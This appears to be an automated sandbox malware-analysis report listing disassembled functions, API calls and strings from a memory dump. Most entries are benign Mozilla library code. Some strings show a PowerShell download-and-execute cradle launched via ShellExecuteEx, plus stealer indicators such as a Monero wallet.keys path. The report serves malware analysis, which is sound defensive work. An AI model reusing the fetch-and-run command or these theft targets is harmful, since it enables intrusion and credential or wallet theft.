Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: ddaf6f8b125b3f6f6eed465e4a80a9166bf3288553cff3e0002d544b284c5598
Instruction ID: c3c579bf121b4f29216cc944803579b568ea5ae6b2b9047ff900d25c0825af38
Opcode Fuzzy Hash: ddaf6f8b125b3f6f6eed465e4a80a9166bf3288553cff3e0002d544b284c5598
Instruction Fuzzy Hash: 82F0B4752002059FDB006F669C8895E77BDEFCA29EF010415FA0583706CF31A801876E

Function 6C6B14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6B14C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6B14E2
GetCurrentThreadId.KERNEL32 ref: 6C6B1546
InitializeConditionVariable.KERNEL32(?), ref: 6C6B15BA
free.MOZGLUE(?), ref: 6C6B16B4

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: 84b113b9a73e277b9fd29e08484e4394e3a35ff6a497e3b0073eb4c8ef52548c
Instruction ID: aba4de780e88ec0fbd8ae92ed5aa9381c591fd8fdf4d159ca99d83c8d4769e11
Opcode Fuzzy Hash: 84b113b9a73e277b9fd29e08484e4394e3a35ff6a497e3b0073eb4c8ef52548c
Instruction Fuzzy Hash: 2361F572A007009BDB118F25C880BDEB7B5BF8A308F04851DED8A67711EB31E955CB99

Function 6C6ADC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6ADC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C6AD38A,?), ref: 6C6ADC6F
free.MOZGLUE(?,?,?,?,?,6C6AD38A,?), ref: 6C6ADCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C6AD38A,?), ref: 6C6ADCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C6AD38A,?), ref: 6C6ADD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C6AD38A,?), ref: 6C6ADD4A

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: e832c0ffbb3be5372cd064647279fbc88c4c6da441537e842909aca23f795383
Instruction ID: bcadd9162a49f29ceb0e17f71bb7541758fe66ea6d43d186fbb7bff36c009d76
Opcode Fuzzy Hash: e832c0ffbb3be5372cd064647279fbc88c4c6da441537e842909aca23f795383
Instruction Fuzzy Hash: 24416BB5A00605DFCB00CF99C88099AB7F5FF89314B654569DE46ABB11D771FC02CB98

Function 000BC84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

memset.MSVCRT ref: 000BC8BF
___crtGetStringTypeA.LIBCMT ref: 000BC8EC
___crtLCMapStringA.LIBCMT ref: 000BC90C
___crtLCMapStringA.LIBCMT ref: 000BC931

Strings

, xrefs: 000BC896

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: String___crt$Typememset
String ID:
API String ID: 3530896902-3916222277
Opcode ID: a1e44939d4aa8538280775686ab4e6f2e229f55a1d8f09e859d382aaf9465094
Instruction ID: d632c8dd05550fad0b8ffcc508f965289905e2b58dc91a06d8777e30964d4af7
Opcode Fuzzy Hash: a1e44939d4aa8538280775686ab4e6f2e229f55a1d8f09e859d382aaf9465094
Instruction Fuzzy Hash: 4D41E5B150079C5EFB318B248C89FFBBBE8AB45704F1444E9E98A86182E2719A44CF64

Function 6C68F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C68F480

Part of subcall function 6C65F100: LoadLibraryW.KERNEL32(shell32,?,6C6CD020), ref: 6C65F122
Part of subcall function 6C65F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C65F132

CloseHandle.KERNEL32(00000000), ref: 6C68F555

Part of subcall function 6C6614B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C661248,6C661248,?), ref: 6C6614C9
Part of subcall function 6C6614B0: memcpy.VCRUNTIME140(?,6C661248,00000000,?,6C661248,?), ref: 6C6614EF

Part of subcall function 6C65EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C65EEE3

CreateFileW.KERNEL32 ref: 6C68F4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C68F523

Strings

\oleacc.dll, xrefs: 6C68F4CB

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: e7e48814ea99a76f411752119c71c55213dd58cbadc32e0fce5a34836752ec9b
Instruction ID: 0d1bc788e9566150df40bd87b32a434fe4a46e126bf0021ca286a0276173a7db
Opcode Fuzzy Hash: e7e48814ea99a76f411752119c71c55213dd58cbadc32e0fce5a34836752ec9b
Instruction Fuzzy Hash: 4541BF706097109FE720DF29D884A9BB7F4AF95318F504A1CF59083690EB70E949CBAB

Function 000B2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

ShellExecuteEx.SHELL32(0000003C), ref: 000B2D85

Strings

-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 000B2CC4
<, xrefs: 000B2D39
')", xrefs: 000B2CB3
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 000B2D04

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: 4d85d4b734d776115a617a31501c03cea7913231aadc87574b1594430315356a
Instruction ID: a5a02981cb6bff03a6c290461ed8bf1ee617c393763bdde337fc9ea8b658a9b2
Opcode Fuzzy Hash: 4d85d4b734d776115a617a31501c03cea7913231aadc87574b1594430315356a
Instruction Fuzzy Hash: F041BF71D10208AADB14EFA0D8A5FDDB774AF15300F404119F116BB592DF746A4ACFA2

Function 6C6B74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C6B7526
__Init_thread_footer.LIBCMT ref: 6C6B7566
__Init_thread_footer.LIBCMT ref: 6C6B7597

Strings

kernel32.dll, xrefs: 6C6B7557
UnmapViewOfFile2, xrefs: 6C6B7552

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 615ffa97ad8c0de051b7642b4bca49c3847e34a81dded684b7e6253d4862282e
Instruction ID: 70c3812f21271e644d1c9f7080f2d601ef814584af8e9d41c780a69cb21825ee
Opcode Fuzzy Hash: 615ffa97ad8c0de051b7642b4bca49c3847e34a81dded684b7e6253d4862282e
Instruction Fuzzy Hash: 1621373270150197CB248FEAD894ED973B5EB87725F054529E80167B80DB31B9118BBF

Function 6C6BC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C6BC0E9), ref: 6C6BC418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C6BC437
FreeLibrary.KERNEL32(?,6C6BC0E9), ref: 6C6BC44C

Strings

ntdll.dll, xrefs: 6C6BC413
NtQueryVirtualMemory, xrefs: 6C6BC431

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: d4ad702163dedae234b04c25129513d6ca49606b68d6455ed9a7693a3667c5d7
Instruction ID: 0baf2aa69d8cf0f9d1a80e002f6a0c30601aa36f70604daba40d504ae963cc98
Opcode Fuzzy Hash: d4ad702163dedae234b04c25129513d6ca49606b68d6455ed9a7693a3667c5d7
Instruction Fuzzy Hash: 14E0B670B01302ABDF007F73C9887127BF8AB46745F044516AB0592614EBB0F652CB5F

Function 000A9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 000A9F41

Part of subcall function 000BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000BA7E6

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Strings

v10, xrefs: 000A9EA3
v20, xrefs: 000A9E21
ERROR_RUN_EXTRACTOR, xrefs: 000A9E67
@, xrefs: 000A9EF1

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocal
String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 4171519190-1096346117
Opcode ID: 6cb2aac095291d39e18c3b8e5432bc731c7033907b50330ee6df5810d9943455
Instruction ID: 88e2b8111bda7f50c914ac0982b325dcb43049ceb3be8a952ecc9476542d145e
Opcode Fuzzy Hash: 6cb2aac095291d39e18c3b8e5432bc731c7033907b50330ee6df5810d9943455
Instruction Fuzzy Hash: E7614170A04248EBDB24EFA4CC96FEE77B5AF46300F008518F90A5F592EF746A05CB52

Function 6C661530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C66159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C6615BC
moz_xmalloc.MOZGLUE(-00000001,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C6615E7
free.MOZGLUE(?,?,?,?,?,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C661606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C661637

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 60c595e13ce2a9c8a199b3a496b84ba9900cf50bf30422973b7d5e0842e1335b
Instruction ID: d01c86a85d46c23a7c691215a81a34074b03034866677b6b18a6f6f243d40b0c
Opcode Fuzzy Hash: 60c595e13ce2a9c8a199b3a496b84ba9900cf50bf30422973b7d5e0842e1335b
Instruction Fuzzy Hash: 9C31EAB1A001149BCB148E7DD8514AEB7A5FB823647240B2DE423DBFD4EB30D915879B

Function 6C6BAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAD9D

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAE01
GetLastError.KERNEL32(?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAE3D

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: 0f21de2af0562fbe7cdfc5f35f1760c945e4117e18b0c4ae4a851e01653c96bd
Instruction ID: 4eb5dd445afc357e947c968c0e77c1b944aa70b059dce956206679de5e0986f5
Opcode Fuzzy Hash: 0f21de2af0562fbe7cdfc5f35f1760c945e4117e18b0c4ae4a851e01653c96bd
Instruction Fuzzy Hash: FB3164B1A002159FDB10DF7A8C44AABB7F8EF49714F15482DE94AE7700E734E815CBA9

Function 6C65B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C65B532
moz_xmalloc.MOZGLUE(?), ref: 6C65B55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C65B56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C65B57E
free.MOZGLUE(00000000), ref: 6C65B58F

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 4d383c59ac1466ad9845e72a84ae01ba623d94f7e40b200926ea7cdfc1fc98de
Instruction ID: 89d8c58b405f94ff87142cdd8ce363126df9faeab29231e2da6d786d2f4b5cda
Opcode Fuzzy Hash: 4d383c59ac1466ad9845e72a84ae01ba623d94f7e40b200926ea7cdfc1fc98de
Instruction Fuzzy Hash: 3D212971A002059BDB00CF69CC80BAEBBB9FF86304F784129E918DB345E736D921C7A5

Function 000B9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(0139E958,?,?,?,000B140C,?,0139E958,00000000), ref: 000B926C
lstrcpyn.KERNEL32(002EAB88,0139E958,0139E958,?,000B140C,?,0139E958), ref: 000B9290
lstrlen.KERNEL32(?,?,000B140C,?,0139E958), ref: 000B92A7
wsprintfA.USER32 ref: 000B92C7

Strings

%s%s, xrefs: 000B92B5

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
